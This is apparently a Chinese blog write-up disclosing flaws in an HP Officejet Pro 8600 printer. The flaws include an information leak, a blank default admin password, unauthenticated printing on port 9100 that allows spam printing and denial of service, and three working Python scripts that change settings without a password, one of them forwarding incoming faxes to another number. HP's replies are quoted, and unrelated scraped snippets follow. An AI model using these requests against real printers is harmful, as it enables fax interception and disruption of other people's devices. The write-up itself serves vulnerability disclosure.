我是如何黑掉惠普打印机的

步骤

首先,我有机会测试惠普Officejet Pro系列打印机

其次,我决定测试它的安全性并用本地无线网络连接做一次扫描。

注:所有的安装步骤都是按照惠普说明手册安装的

信息泄漏

我在HP打印机的本地IP上运行了nmap,并得到了一些有趣的结论,在我看来,当任何本地网络用户连接在同一网络时,他们的网络信息就会被泄漏,你可以在80端口上完整的读取到对方的机型以及相应的打印机序列号。

HP Officejet Pro 8600 printer http config (Serial CN1CTxxxxxxxxxx)

161端口上则可以读取到MAC地址、以太网速度和流量统计

MAC address: xx:xx:xx:xx:xx:xx (Hewlett-Packard Company)
Type: ethernetCsmacd Speed: 10 Mbps
Status: up
Traffic stats: 1.33 Mb sent, 2.39 Mb received

SNMP上读到打印机建立的连接和系统正常运行时间

TCP 192.168.1.89:9110 192.168.1.65:30645
TCP 192.168.1.89:9111 192.168.1.65:70
TCP 192.168.1.89:47485 15.201.141.250:5222
System uptime: 0 days, 5:11:07.91 (1866791 timeticks)

使用Nmap–smb-os-discovery脚本,可以使用“guest”账户来了解打印机的系统信息:如

OS:VxWorks(NQ 4.32)

而这些信息本应该是受限制和保护的,因为这些信息很可能被用来发动其它类型的攻击。

HP声称:HP打印机在连接过程中所提供的信息是设定好的,因为如果用户想要搜寻到打印机信号并正确的连接到其中一个,打印机就需要处于可被发现的状态,而这势必会需要打印机提供一个唯一可辨明身份的信息以来确保被使用。

HP今后也将致力于衡量和平衡如何在限制信息不被泄露的情况下又能保证提供给用户所需要的重要信息。

管理面板访问和错误的密码加密类型

另一个主要的问题是管理员控制面板默认用户名名没有设置密码,在我看来是很糟糕的安全策略。第一次连接管理员控制面板应该要求输入用户名和密码,同时如果你想添加或修改密码,密码是经过Base64加密的,是非常不安全的加密方法。

HP声称:我们不认为一个默认的密码可以增加任何的安全性,因为他只会跟路由器密码一样成为大众所周知的,这对于那些不知道默认密码的新手用户来说不但会带来不便,而且增加了没有意义的安全。
我们支持通过HTTPS传输的基础身份认证。

垃圾打印和拒绝服务

在我看来,我认为最有威胁的安全问题是P9100的默认访问(同样可以称作未授权访问)在管理面板中,HP声称通过TCP的9100端口来对打印服务进行支持。同样可以通过HP的软件- HP Standard Port进行连接,后来我通过nmap发现开放了3个端口:9100,9101和9102,

如果你通过远程登录连接上这三个端口中的其中一个,你就可以在他的终端系统打印任何你想要打印的类型,需要注意的是,一旦你通过远程登录连接到打印机,打印面板显示正在打印中后,你需要保持打印机处于忙碌状态直到你关闭远程登录会话,以防止其它用户使用打印机。

计算机连接到远程登录甚至不需要安装打印机或访问打印机,只需要连接本地网络。

通过谷歌搜索我已经了解到,许多公司通过互联网都存在着垃圾打印的问题,或许这与这些受影响公司没有过滤和关闭打印机上的一些端口有关?

对于那些受垃圾打印影响的公司来说,这一安全问题无疑是昂贵的,因为有人可以全方面的来消耗他们的资源——纸张和墨,甚至损坏他们的打印机,如果有人写一些脚本并发送一个简单的请求到端口上,就可能会使打印机一直处于打印和占用状态。

HP声称:通过Windows 标准的TCP / IP端口监视器要求9100端口在默认情况下打开是设定好的,而其他端口,如9101和9102则被用于诊断和发现故障的目的,并没有提供有用的数据。

未经许可修改打印机选项(管理员启用了密码保护)

我写了一些Python脚本,允许本地网络上的任何人在没有密码的情况下修改打印机选项。

改变电源节省超时时间

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:PowerSaveTimeout>5minutes</dd:PowerSaveTimeout></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

重定向FAX为其他数字

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<faxcfgdyn:FaxConfigDyn xmlns:faxcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:fax="http://www.hp.com/schemas/imaging/con/fax/2008/06/13" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03 ../schemas/FaxConfigDyn.xsd"><faxcfgdyn:ReceiveSettings><dd:FaxForwardingNumber>111111111</dd:FaxForwardingNumber><fax:ReceiveForward>forward</fax:ReceiveForward><faxcfgdyn:ForwardScheduleSettings><faxcfgdyn:ForwardStartTime><dd:TimeStamp>2015-02-26T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStartTime><faxcfgdyn:ForwardStopTime><dd:TimeStamp>2015-02-28T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStopTime></faxcfgdyn:ForwardScheduleSettings></faxcfgdyn:ReceiveSettings></faxcfgdyn:FaxConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/FaxConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

关闭定时打印

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:ScheduledOffScheduledOnTime><dd:ScheduledOff><dd:AutoOffTimeSetting>enabled</dd:AutoOffTimeSetting><dd:AutoOffTimeAndDaySetting><dd:AutoOffTimeValue>19:00:00</dd:AutoOffTimeValue><dd:DaysOfWeek>sunday</dd:DaysOfWeek></dd:AutoOffTimeAndDaySetting><dd:Deferred>false</dd:Deferred></dd:ScheduledOff><dd:ScheduledOn><dd:AutoOnTimeSetting>disabled</dd:AutoOnTimeSetting><dd:AutoOnTimeAndDaySetting><dd:AutoOnTimeValue>00:00:00</dd:AutoOnTimeValue></dd:AutoOnTimeAndDaySetting></dd:ScheduledOn></dd:ScheduledOffScheduledOnTime></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

你可以以这种方式来设置管理更多的服务 

HP声称:在没有管理员密码的情况下,HP公司的企业级打印机不允许任何持久性的设置更改,但对于一些小团体的使用者来说(家庭消费者和小型企业),允许他们在没有管理员密码的情况下做一些小范围的持久性更改。

惠普目前已经修复了一些用户层面的设置并认识到在专有配置接口设置密码保护的优势,HP将持续研究这些端口的安全性。

我没有测试过其他类型的HP打印机所以我不知道是否其他的机型也存在类似的问题但我想感谢惠普公司提供的反馈,即使他们站在不同于我的安全角度,在安全研究人员之间,建立沟通交流是很重要的。

时间: 2024-09-28 01:51:36

我是如何黑掉惠普打印机的的相关文章

win7电脑连接惠普打印机后文件打印不出来怎么办

  win7电脑连接惠普打印机后文件打印不出来怎么办 解决方法一: 1.打开控制面板-打印机界面; 2.右击打印机将其删除; 3.如果没选中当前的任何一个打印机,菜单是这样的; 4.选中任何一个打印机,选中"打印服务器属性"; 5.打印服务器属性,切换到驱动程序界面; 6.选中刚删掉的打印机的驱动,并点击删除按钮; 7.删除 驱动程序 和 驱动程序包;

利用无人机或吸尘器黑掉企业无线打印机

根据iTrust的一组研究人员演示,使用一架无人机和一部智能手机就能在办公楼外拦截无线打印机传输的数据.此外,通过在楼内使用一个吸尘器和一部智能手机同样能够攻击企业无线打印机. 利用无人机攻击无线打印机 最近我在Infosec Institute上写了一篇题目为<现代物理安全意识不仅仅是垃圾搜寻>的博文,文中我解释了物理安全概念如何随着科技而进化.特别是,我还特意分析了无人机所带来的威胁.事实上,这些设备能够轻易绕过传统的物理防御系统,并能够因不同目的以各种方式攻击目标. iTrust(新加坡

Win8.1安装惠普打印机驱动程序

  方法一: 使用 HP 打印机安装向导 如果您在 Windows 8 发布前购买打印机,那么您的产品所附带的光盘上可能没有最新的打印机驱动程序; 但是,您可以使用 HP 打印机安装向导轻松找到和下载最新的打印机驱动程序."打印机安装向导"是一款可以自动为您的 HP 打印机找到最佳 Windows 8 驱动程序的工具. 注意: 打印机安装向导不适用于所有 HP 打印机,仅适用于 Windows 7 或 Windows 8 操作系统. 打印机安装向导适用于连接了 USB 连接线的打印机或

Win8.1怎么安装惠普打印机驱动程序呢?

  第一种方法: 保存该实用程序 在"安全警告"对话框中,单击"保存". 打开"另存为"窗口时,浏览到桌面,然后单击"保存". 完成下载后,浏览到保存的文件,然后双击该文件安装该实用程序. 如果"安全警告"对话框没有打开 1. 单击通知栏中的"运行",下载软件. 2. 单击"用户帐户控制"窗口中的"是". 向导完成安装后,将自动打开向导. 步骤二:

惠普打印机怎么设置关闭SNMP选项?

  惠普打印机关闭SNMP选项,解决联机无法打印 1.故障:打印机一切显示就绪,能够ping 通,打印机图标显示脱机,但无法打印. 解决方法:需更改snmp选择 方法一: 进入EWS---Networking---Network Settings---SNMP,选择Disable SNMPv1/v2. 方法二: 驱动右键属性---端口----配置端口

惠普打印机爆远程命令执行漏洞,黑客可任意操纵你的打印机

本文讲的是惠普打印机爆远程命令执行漏洞,黑客可任意操纵你的打印机,在各类企业.单位甚至是学校,无论你身处在哪里,打印机都会作为必需品存在.也许你体验到的是其便捷的一面,但你是否了解其作为联网设备的危害在哪里呢?仔细回想一下,你上一次更新它的固件是什么时候?你是否了解过打印机所存在的那些漏洞? 出于对打印机安全性的好奇,我们购买了几台打印机(HP OfficeJet Pro 8210).事实上,在买的时候我们一直祈祷其那些易受攻击的固件仍然存在,否则你肯定无法想象你需要多少时间来进行回溯.幸运的是

电脑黑屏惠普让用户找自身原因

3月15日晚8点,备受瞩目的CCTV3·15晚会在中央电视台.中国网络电视台同时直播,本届晚会的主题是"新规则.新动力".晚会在第一个专题就揭露了LG等品牌电视大玩文字游戏,以"平板电视不是电视"的借口拒绝履行保修服务的"潜规则":针对目前大家普遍使用的一次性筷子,晚会用一组组镜头, 曝光了其生产过程中使用的有害健康的各式各样的化学物质,可谓触目惊心:关于饱受诟病的SP商,如今又有了敛财新手段:手机厂商与SP商勾结,将暗藏收费代码的手机卖给不知情

安装HP(惠普)打印机报错 0x000006be解决方法

1. 首先打开控制面板   2.在程序和功能窗口中找是否有HP的打印机驱动,卸载掉   3.打开C:/Windows/System32/spool/drivers/W32X86 看一下这个文件夹下是否有2或3命名的文件夹,打开文件夹把里面的东西删除(不要直接删除整个文件夹) 再看一下是否有叫做"hewlett_packard", "hphp"的文件,有的话也删除掉. 4.点击开始输入regedit打开注册表编辑器   找到键值 HKEY_LOCAL_MACHINE/

惠普打印机怎么校准?惠普HP Designjet Z2100做颜色校准的教程

  惠普HP Designjet Z2100 如何做颜色校准 1.请勿使用透明或半透明纸张校准颜色.建议使用相纸或涂料纸以获得最佳质量. 确保关上透明护盖,因为如果在重新对齐打印头的过程中打印机附近有强光源,则会影响对齐. 2.通过颜色校准,您的打印机可根据您使用的特定打印头.墨水和纸张在特定环境条件下生成一致的色彩. 进行颜色校准之后,即使通过位于不同国家/地区的两台不同打印机进行打印,也可以获得完全相同的打印效果. 除非您禁用了警报功能,否则每当需要执行颜色校准时,打印机通常会用警报提醒您.